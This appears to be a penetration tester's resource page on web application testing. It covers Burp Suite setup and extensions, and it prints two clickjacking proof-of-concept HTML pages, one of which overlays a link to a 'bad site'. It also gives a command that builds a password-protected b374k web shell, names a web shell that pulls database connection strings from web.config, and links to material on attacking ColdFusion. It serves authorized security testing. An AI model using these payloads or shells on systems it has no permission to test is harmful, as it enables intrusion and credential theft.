I did a video demo of how to get up and going with Burp quickly in episode #230 of the 7 Minute Security podcast. It includes things like:
- Getting Burp installed
- Installing the SSL cert
- Installing FoxyProxy and proxying traffic through Burp
- Setting up a quick shell script to start Burp from the command line:
java -Xmx2g -jar burpsuite.jar
-
CO2 has a bunch of tricks up its sleeve - my favorite of which is helping you craft sqlmap commands with the right flags
-
Reflector (I've not tested this one) claims to be able to find XSS in real time. It doesn't integrate directly with Burp via the BApp Store, but definitely looks to be worth checking out.
-
retire.js looks for old/outdated/vulnerable Javascript libraries *
-
Software Vulnerability Scanner helps you find vulnerable software, such as old versions of IIS.
Here's a good page about clickjacking, and if you need to whip together a quick PoC for a client, I find this one works pretty well:
<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<p>Website is vulnerable to clickjacking!</p>
<iframe src="http://www.target.site" width="500" height="500"></iframe>
</body>
</html>
As does this one:
<html>
<title>This is your totally safe corporate site...OR IS IT?!?!?!?!?!?</title>
<head>
<style>
body {
position: relative;
margin: 0;
}
iframe, div, a {
border: none;
position: absolute;
width: 100%;
height: 100%;
}
div {
z-index: 100;
}
a {
display: block;
}
</style>
</head>
<body>
<iframe src="https://name-of-site-without-sameorigin-set-correctly.com">
</iframe>
<div>
<a href=" http://www.some-really-really-bad-site.com "></a>
</div>
</body>
</html>
Sites that help attacking CF:
https://jumpespjump.blogspot.com/2014/03/attacking-adobe-coldfusion.html http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/ https://www.exploit-db.com/exploits/14641/ (contains path that CFIDE admin might live in) https://github.com/averagesecurityguy/scripts/ - contains some scripts for attacking CF https://dl.packetstormsecurity.net/papers/attack/topseven-coldfusion.pdf - top 5 CF vulns https://www.cvedetails.com/vulnerability-list/vendor_id-53/product_id-8739/version_id-39015/Adobe-Coldfusion-7.0.html - CF 7 vulns http://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf - great paper from Chris Gates on attacking CF
-
PayloadsAlltheThings is "a list of useful payloads and bypass for Web Application Security and Pentest/CTF."
-
XSS-Problems will "help you solve problems you might encounter while trying to XSS a target."
This blog gives some great guidance and a checklist for using/abusing Webshells.
The HighonCoffee cheat sheet is also awesome.
One of my fav Web shells is b374k, and as a quick ref, once you clone it from github, you can get a shell compiled pretty quick with:
php -f index.php -- -o myShell.php -p MyPasswordGoesHere -s -b -z gzcompress -c 9
This nice Webshell from NetSPI is handy for the following tasks (according to the Web site)
- Execute operating system commands
- Parse web.config files for connection strings (based on root directory)
- Execute MSSQL queries using connection strings recovered from web.config files
Note: the accompanying blog reminds us that this only works on IIS sites that allow execution of .aspx files.
This site has some great tips for abusing file upload functionality.
Nice site showing the risks of XSS.